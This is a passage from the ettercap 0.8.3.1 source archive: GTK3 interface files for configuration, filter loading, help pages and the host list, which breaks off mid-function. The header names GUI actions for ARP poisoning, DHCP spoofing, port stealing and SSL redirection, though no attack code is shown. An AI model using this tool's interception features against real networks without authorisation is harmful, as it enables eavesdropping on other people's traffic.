*/ void gtkui_filename_browse(GtkWidget *widget, gpointer data) { GtkWidget *dialog = NULL; gint response = 0; const char *filename = NULL; /* variable not used */ (void) widget; dialog = gtk_file_chooser_dialog_new("Select a file...", NULL, GTK_FILE_CHOOSER_ACTION_OPEN, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_entry_set_text(GTK_ENTRY (data), filename); } gtk_widget_destroy(dialog); } /* make sure data is valid UTF8 */ char *gtkui_utf8_validate(char *data) { const gchar *end; char *unicode = NULL; unicode = data; if(!g_utf8_validate (data, -1, &end)) { /* if "end" pointer is at beginning of string, we have no valid text to print */ if(end == unicode) return(NULL); /* cut off the invalid part so we don't lose the whole string */ /* this shouldn't happen often */ unicode = (char *)end; *unicode = 0; unicode = data; } return(unicode); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3.h000664 000000 000000 00000016346 13711276346 020746 0ustar00rootroot000000 000000 #ifndef ETTERCAP_GTK_H #define ETTERCAP_GTK_H #define G_DISABLE_CONST_RETURNS #include #include #include #include #define LOGO_FILE "ettercap.png" #define LOGO_FILE_SMALL "ettercap-small.png" #define ICON_FILE "ettercap.svg" #ifndef GTK_WRAP_WORD_CHAR #define GTK_WRAP_WORD_CHAR GTK_WRAP_WORD #endif struct gtk_conf_entry { char *name; short value; }; typedef struct gtk_accel_map { /* detailed action name */ char *action; /* * NULL terminated accelerator string-array, * able to contain up to 2 accelerators per action */ const char * const accel[3]; } gtkui_accel_map_t; struct resolv_object { /* Widget type to be updated */ GType type; /* Widget to be updated */ GtkWidget *widget; /* List Stores are not of type GtkWidget */ GtkListStore *liststore; /* some attributes needed to update the widget */ GtkTreeIter treeiter; guint column; /* The IP address to resolve */ struct ip_addr *ip; }; /* ec_gtk.c */ extern GtkApplication *etterapp; extern GtkWidget *window; /* main window */ extern GtkWidget *notebook, *notebook_frame; extern GtkWidget *textview; extern GtkWidget *infobar; extern GtkWidget *infolabel; extern GtkWidget *infoframe; extern GtkTextBuffer *msgbuffer; extern GtkTextMark *endmark; extern GTimer *progress_timer; extern void set_gtk_interface(void); extern void gtkui_about(GSimpleAction *action, GVariant *value, gpointer data); extern GtkWidget* gtkui_message_dialog(GtkWindow *parent, GtkDialogFlags flags, GtkMessageType type, GtkButtonsType buttons, const char *msg); extern GtkWidget* gtkui_infobar_new(GtkWidget *infoframe); extern void gtkui_infobar_show(GtkMessageType type, const gchar *msg); extern void gtkui_infobar_hide(GtkWidget *widget, gint response, gpointer data); extern void gtkui_message(const char *msg); extern void gtkui_input(const char *title, char *input, size_t n, void (*callback)(void)); extern void gtkui_exit(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_sniff_offline(void); extern void gtkui_sniff_live(void); extern gboolean gtkui_iptoa_deferred(gpointer data); extern gboolean gtkui_combo_enter(GtkWidget *widget, GdkEventKey *event, gpointer data); extern void gtkui_dialog_enter(GtkWidget *widget, gpointer data); extern gboolean gtkui_context_menu(GtkWidget *widget, GdkEventButton *event, gpointer data); extern void gtkui_filename_browse(GtkWidget *widget, gpointer data); extern char *gtkui_utf8_validate(char *data); /* MDI pages */ extern GtkWidget *gtkui_page_new(char *title, void (*callback)(void), void (*detacher)(GtkWidget *)); extern void gtkui_page_present(GtkWidget *child); extern void gtkui_page_close(GtkWidget *widget, gpointer data); extern void gtkui_page_close_current(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_page_detach_current(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_page_attach_shortcut(GtkWidget *win, void (*attacher)(void)); extern void gtkui_page_right(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_page_left(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_menus.c */ /* * 0 for offline menus * 1 for live menus */ extern void gtkui_create_menu(GApplication *app, gpointer data); extern void gtkui_create_tab_menu(void); /* ec_gtk3_start.c */ extern void gtkui_start_sniffing(void); extern void gtkui_stop_sniffing(void); /* ec_gtk3_filters.c */ extern void gtkui_load_filter(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_stop_filter(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_hosts.c */ #ifdef WITH_IPV6 extern void toggle_ip6scan(GSimpleAction *action, GVariant *value, gpointer data); #endif extern void gtkui_scan(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_load_hosts(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_save_hosts(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_host_list(GSimpleAction *action, GVariant *value, gpointer data); extern gboolean gtkui_refresh_host_list(gpointer data); /* ec_gtk3_view.c */ extern void gtkui_show_stats(GSimpleAction *action, GVariant *value, gpointer data); extern void toggle_resolve(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_vis_method(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_vis_regex(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_wifi_key(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_targets.c */ extern void toggle_reverse(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_select_protocol(GSimpleAction *action, GVariant *value, gpointer data); extern void wipe_targets(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_select_targets(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_current_targets(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_create_targets_array(void); /* ec_gtk3_view_profiles.c */ extern void gtkui_show_profiles(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_mitm.c */ extern void gtkui_arp_poisoning(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_icmp_redir(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_port_stealing(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_dhcp_spoofing(GSimpleAction *action, GVariant *value, gpointer data); #ifdef WITH_IPV6 extern void gtkui_ndp_poisoning(GSimpleAction *action, GVariant *value, gpointer data); #endif extern void gtkui_mitm_stop(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_redirect.c */ extern void gtkui_sslredir_show(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_logging.c */ extern void toggle_compress(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_log_all(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_log_info(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_log_msg(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_stop_log(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_stop_msg(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_plugins.c */ extern void gtkui_plugin_mgmt(GSimpleAction *action, GVariant *value, gpointer data); extern void gtkui_plugin_load(GSimpleAction *action, GVariant *value, gpointer data); extern gboolean gtkui_refresh_plugin_list(gpointer data); extern gboolean gtkui_plugins_autostart(gpointer data); /* ec_gtk3_view_connections.c */ extern void gtkui_show_connections(GSimpleAction *action, GVariant *value, gpointer data); /* ec_gtk3_conf.c */ extern void gtkui_conf_set(char *name, short value); extern short gtkui_conf_get(char *name); extern void gtkui_conf_read(void); extern void gtkui_conf_save(void); #ifndef OS_WINDOWS /* ec_gtk3_help.c */ extern void gtkui_help(GSimpleAction *action, GVariant *value, gpointer data); #endif /* ec_gtk3_shortcuts.c */ extern void gtkui_show_shortcuts(GSimpleAction *action, GVariant *value, gpointer data); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_conf.c000664 000000 000000 00000005106 13711276346 021736 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include static char *filename = NULL; static struct gtk_conf_entry settings[] = { { "window_top", 0 }, { "window_left", 0 }, { "window_height", 440 }, { "window_width", 800 }, { NULL, 0 }, }; void gtkui_conf_set(char *name, short value) { short c = 0; DEBUG_MSG("gtkui_conf_set: name=%s value=%hu", name, value); for(c = 0; settings[c].name != NULL; c++) { if(!strcmp(name, settings[c].name)) { settings[c].value = value; break; } } } short gtkui_conf_get(char *name) { unsigned short c = 0; DEBUG_MSG("gtkui_conf_get: name=%s", name); for(c = 0; settings[c].name != NULL; c++) { if(!strcmp(name, settings[c].name)) return(settings[c].value); } return(0); } void gtkui_conf_read(void) { FILE *fd; const char *path; char line[100], name[30]; short value; /* If you launch ettercap using sudo, then the config file is your user config dir */ path = g_get_user_config_dir(); filename = g_build_filename(path, "ettercap_gtk", NULL); DEBUG_MSG("gtkui_conf_read: %s", filename); fd = fopen(filename, "r"); if(!fd) return; while(fgets(line, 100, fd)) { char *p = strchr(line, '='); if(!p) continue; *p = '\0'; strlcpy(name, line, sizeof(name)); g_strstrip(name); value = atoi(p + 1); gtkui_conf_set(name, value); } fclose(fd); } void gtkui_conf_save(void) { FILE *fd; int c; DEBUG_MSG("gtkui_conf_save"); if(!filename) return; fd = fopen(filename, "w"); if(fd != NULL) { for(c = 0; settings[c].name != NULL; c++) fprintf(fd, "%s = %hd\n", settings[c].name, settings[c].value); fclose(fd); } g_free(filename); filename = NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_filters.c000664 000000 000000 00000005205 13711276346 022461 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /*******************************************/ /* * display the file open dialog */ void gtkui_load_filter(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *chooser, *content; gchar *filename; int response = 0; char *path = get_full_path("share", ""); (void) action; (void) value; (void) data; DEBUG_MSG("gtk_load_filter"); dialog = gtk_dialog_new_with_buttons("Select a precompiled filter file...", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); chooser = gtk_file_chooser_widget_new(GTK_FILE_CHOOSER_ACTION_OPEN); gtk_container_add(GTK_CONTAINER(content), chooser); gtk_widget_show(chooser); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(chooser), path); SAFE_FREE(path); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(chooser)); /* * load the filters chain. * errors are spawned by the function itself */ filter_load_file(filename, EC_GBL_FILTERS, 1); g_free(filename); } gtk_widget_destroy (dialog); } /* * uload the filter chain */ void gtkui_stop_filter(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; DEBUG_MSG("gtk_stop_filter"); filter_unload(EC_GBL_FILTERS); gtkui_message("Filters were unloaded"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_help.c000664 000000 000000 00000016743 13711276346 021752 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #ifndef OS_WINDOWS #include #include #include #include /* globals */ static GtkTreeSelection *selection = NULL; static GtkListStore *liststore = NULL; static GtkTextBuffer *textbuf = NULL; typedef struct { char *title; char *file; } help_pair; help_pair help_list[] = { { "ettercap", "ettercap" }, { "logging", "etterlog" }, { "filters", "etterfilter" }, { "plugins", "ettercap_plugins" }, { "settings", "etter.conf" }, { "curses", "ettercap_curses" }, { NULL, NULL } }; /* proto */ void gtkui_help_open(char *file); void gtkui_help_selected(GtkTreeSelection *treeselection, gpointer data); /********************************************/ void gtkui_help(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *scrolled, *treeview, *hbox, *textview, *content_area; GtkWidget *header; GtkCellRenderer *renderer; GtkTreeViewColumn *column; GtkTreeIter iter; help_pair *section; (void) action; (void) value; (void) data; DEBUG_MSG("gtkui_help"); header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), PROGRAM " Help"); gtk_header_bar_set_decoration_layout(GTK_HEADER_BAR(header), ":close"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); dialog = gtk_dialog_new(); gtk_window_set_title(GTK_WINDOW(dialog), PROGRAM " Help"); gtk_window_set_titlebar(GTK_WINDOW(dialog), header); gtk_window_set_modal(GTK_WINDOW(dialog), TRUE); gtk_window_set_default_size(GTK_WINDOW (dialog), 780, 580); gtk_window_set_transient_for(GTK_WINDOW(dialog), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dialog), GTK_WIN_POS_CENTER_ON_PARENT); #if !GTK_CHECK_VERSION(2, 22, 0) // depricated since Gtk 2.22 gtk_dialog_set_has_separator(GTK_DIALOG (dialog), TRUE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 6); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_box_pack_start(GTK_BOX(content_area), hbox, TRUE, TRUE, 0); scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_NEVER, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, FALSE, FALSE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_tree_view_set_headers_visible(GTK_TREE_VIEW (treeview), FALSE); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect(selection, "changed", G_CALLBACK (gtkui_help_selected), liststore); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Contents", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); liststore = gtk_list_store_new (2, G_TYPE_STRING, G_TYPE_POINTER); for(section = help_list; section->title; section++) { gtk_list_store_append (liststore, &iter); gtk_list_store_set (liststore, &iter, 0, section->title, 1, section->file, -1); } gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore)); /* text area */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview), FALSE); gtk_container_add(GTK_CONTAINER (scrolled), textview); gtk_widget_show(textview); textbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview)); gtk_widget_show_all(dialog); gtk_dialog_run(GTK_DIALOG (dialog)); gtk_widget_destroy (dialog); } void gtkui_help_open(char *file) { const char *full = "sh -c \"man %s | col -b\""; char *data = NULL, *unicode = NULL, *errors = NULL, *cmd; gboolean ret = FALSE; gint len = 0; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); // try to find the system installed man ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { g_free(errors); // system man not found, try non-standard man(8) installation directory full = "sh -c \"man -M " MAN_INSTALLDIR " %s | col -b\""; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { g_free(errors); // man not found in the man installation directory, try build directory full = "sh -c \"man ./man/%s.8 | col -b\""; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { g_free(errors); // man(8) in the build directory not found, but etter.conf is man(5) full = "sh -c \"man ./man/%s.5 | col -b\""; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { ui_error(errors); g_free(errors); } } } } /* print output of command in help window */ if(data && ret) { if ((unicode = gtkui_utf8_validate(data))) gtk_text_buffer_set_text(textbuf, unicode, -1); g_free(data); } } void gtkui_help_selected(GtkTreeSelection *treeselection, gpointer data) { GtkTreeIter iter; GtkTreeModel *model; gchar *file; /* variable not used */ (void) data; if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (treeselection), &model, &iter)) { gtk_tree_model_get (model, &iter, 1, &file, -1); if(!file) return; gtkui_help_open(file); } } #endif ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_hosts.c000664 000000 000000 00000035176 13711276346 022163 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void load_hosts(const char *file); static void save_hosts(void); static void gtkui_hosts_destroy(void); static void gtkui_button_callback(GtkWidget *widget, gpointer data); static void gtkui_hosts_detach(GtkWidget *child); static void gtkui_hosts_attach(void); /* globals */ static GtkWidget *hosts_window = NULL; static GtkTreeSelection *selection = NULL; static GtkListStore *liststore = NULL; enum { HOST_DELETE, HOST_TARGET1, HOST_TARGET2 }; /*******************************************/ #ifdef WITH_IPV6 void toggle_ip6scan(GSimpleAction *action, GVariant *value, gpointer data) { (void) data; g_simple_action_set_state(action, value); EC_GBL_OPTIONS->ip6scan ^= 1; } #endif /* * scan the lan for hosts */ void gtkui_scan(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; /* no target defined... force a full scan */ if (EC_GBL_TARGET1->all_ip && EC_GBL_TARGET2->all_ip && EC_GBL_TARGET1->all_ip6 && EC_GBL_TARGET2->all_ip6 && !EC_GBL_TARGET1->scan_all && !EC_GBL_TARGET2->scan_all) { EC_GBL_TARGET1->scan_all = 1; EC_GBL_TARGET2->scan_all = 1; } /* perform a new scan */ build_hosts_list(); } /* * display the file open dialog */ void gtkui_load_hosts(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *chooser, *content; gchar *filename; int response = 0; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_load_hosts"); dialog = gtk_dialog_new_with_buttons("Select a hosts file...", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); chooser = gtk_file_chooser_widget_new(GTK_FILE_CHOOSER_ACTION_OPEN); gtk_container_add(GTK_CONTAINER(content), chooser); gtk_widget_show(chooser); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(chooser), ""); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(chooser)); load_hosts(filename); gtkui_refresh_host_list(NULL); g_free(filename); } gtk_widget_destroy (dialog); } static void load_hosts(const char *file) { char *tmp; char current[PATH_MAX]; DEBUG_MSG("load_hosts %s", file); SAFE_CALLOC(tmp, strlen(file)+1, sizeof(char)); /* get the current working directory */ getcwd(current, PATH_MAX); /* we are opening a file in the current dir. * use the relative path, so we can open files * in the current dir even if the complete path * is not traversable with ec_uid permissions */ if (!strncmp(current, file, strlen(current))) snprintf(tmp, strlen(file)+1,"./%s", file+strlen(current)); else snprintf(tmp, strlen(file), "%s", file); DEBUG_MSG("load_hosts path == %s", tmp); /* wipe the current list */ del_hosts_list(); /* load the hosts list */ scan_load_hosts(tmp); SAFE_FREE(tmp); gtkui_host_list(NULL, NULL, NULL); } /* * display the write file menu */ void gtkui_save_hosts(GSimpleAction *action, GVariant *value, gpointer data) { #define FILE_LEN 40 GtkWidget *dialog, *chooser, *content; gchar *filename; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_save_hosts"); SAFE_FREE(EC_GBL_OPTIONS->hostsfile); SAFE_CALLOC(EC_GBL_OPTIONS->hostsfile, FILE_LEN, sizeof(char)); dialog = gtk_dialog_new_with_buttons("Save hosts to file...", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); chooser = gtk_file_chooser_widget_new(GTK_FILE_CHOOSER_ACTION_SAVE); gtk_container_add(GTK_CONTAINER(content), chooser); gtk_widget_show(chooser); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(chooser), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(chooser)); gtk_widget_destroy(dialog); memcpy(EC_GBL_OPTIONS->hostsfile, filename, FILE_LEN); g_free(filename); save_hosts(); } else { gtk_widget_destroy(dialog); } } static void save_hosts(void) { FILE *f; /* check if the file is writeable */ f = fopen(EC_GBL_OPTIONS->hostsfile, "w"); if (f == NULL) { ui_error("Cannot write %s", EC_GBL_OPTIONS->hostsfile); SAFE_FREE(EC_GBL_OPTIONS->hostsfile); return; } /* if ok, delete it */ fclose(f); unlink(EC_GBL_OPTIONS->hostsfile); scan_save_hosts(EC_GBL_OPTIONS->hostsfile); } /* * display the host list */ void gtkui_host_list(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *scrolled, *treeview, *vbox, *hbox, *button, *item, *context_menu; GtkCellRenderer *renderer; GtkTreeViewColumn *column; static gint host_delete = HOST_DELETE; static gint host_target1 = HOST_TARGET1; static gint host_target2 = HOST_TARGET2; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_host_list"); if(hosts_window) { if(GTK_IS_WINDOW (hosts_window)) gtk_window_present(GTK_WINDOW (hosts_window)); else gtkui_page_present(hosts_window); return; } hosts_window = gtkui_page_new("Host List", >kui_hosts_destroy, >kui_hosts_detach); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER (hosts_window), vbox); gtk_widget_show(vbox); scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("IP Address", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("MAC Address", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Description", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* populate the list or at least allocate a spot for it */ gtkui_refresh_host_list(NULL); /* set the elements */ gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore)); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_box_pack_start(GTK_BOX (vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); button = gtk_button_new_with_mnemonic("_Delete Host"); gtk_box_pack_start(GTK_BOX (hbox), button, TRUE, TRUE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_button_callback), &host_delete); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("Add to Target _1"); gtk_box_pack_start(GTK_BOX (hbox), button, TRUE, TRUE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_button_callback), &host_target1); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("Add to Target _2"); gtk_box_pack_start(GTK_BOX (hbox), button, TRUE, TRUE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_button_callback), &host_target2); gtk_widget_show(button); context_menu = gtk_menu_new(); item = gtk_menu_item_new_with_label("Add to Target 1"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_button_callback), &host_target1); gtk_widget_show(item); item = gtk_menu_item_new_with_label("Add to Target 2"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_button_callback), &host_target2); gtk_widget_show(item); item = gtk_menu_item_new_with_label("Delete host"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_button_callback), &host_delete); gtk_widget_show(item); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); gtk_widget_show(hosts_window); } static void gtkui_hosts_detach(GtkWidget *child) { hosts_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (hosts_window), "Hosts list"); gtk_window_set_default_size(GTK_WINDOW (hosts_window), 400, 300); g_signal_connect (G_OBJECT (hosts_window), "delete_event", G_CALLBACK (gtkui_hosts_destroy), NULL); gtk_container_add(GTK_CONTAINER (hosts_window), child); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(hosts_window, gtkui_hosts_attach); gtk_window_present(GTK_WINDOW (hosts_window)); } static void gtkui_hosts_attach(void) { /* destroy the current window */ gtkui_hosts_destroy(); /* recreate the tab */ gtkui_host_list(NULL, NULL, NULL); } void gtkui_hosts_destroy(void) { gtk_widget_destroy(hosts_window); hosts_window = NULL; } /* * populate the list */ gboolean gtkui_refresh_host_list(gpointer data) { GtkTreeIter iter; struct hosts_list *hl; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; /* avoid warning */ (void)data; DEBUG_MSG("gtk_refresh_host_list"); /* The list store contains a 4th column that is NOT displayed by the treeview widget. This is used to store the pointer for each entry's structure. */ if(liststore) gtk_list_store_clear(GTK_LIST_STORE (liststore)); else 